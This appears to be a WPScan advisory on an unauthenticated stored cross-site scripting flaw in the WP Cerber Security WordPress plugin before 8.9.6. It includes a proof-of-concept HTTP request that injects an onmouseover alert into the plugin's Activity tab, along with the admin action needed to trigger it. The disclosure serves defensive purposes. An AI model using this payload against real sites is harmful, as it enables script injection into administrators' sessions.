WP Cerber Security, Anti-spam & Malware Scan < 8.9.6 - Unauthenticated Stored Cross-Site Scripting

2022-02-1400:00:00

Krzysztof Zając

wpscan.com

0.001 Low

EPSS

Percentile

44.4%

JSON

The plugin does not sanitise the $url variable before using it in an attribute in the Activity tab in the plugins dashboard, leading to an unauthenticated stored Cross-Site Scripting vulnerability.

PoC

POST /"/onmouseover=alert(1);// HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 100 a[b][c][d][e][f][g][h][i][j][k][l][m][n][o][p][q][r][s][t][u][v][w][x][y][z][1][2][3][4][5][6]=12345 Then the admin needs to browse to http://127.0.0.1:8001/wp-admin/admin.php?page=cerber-security&tab;=activity and move mouse over the link.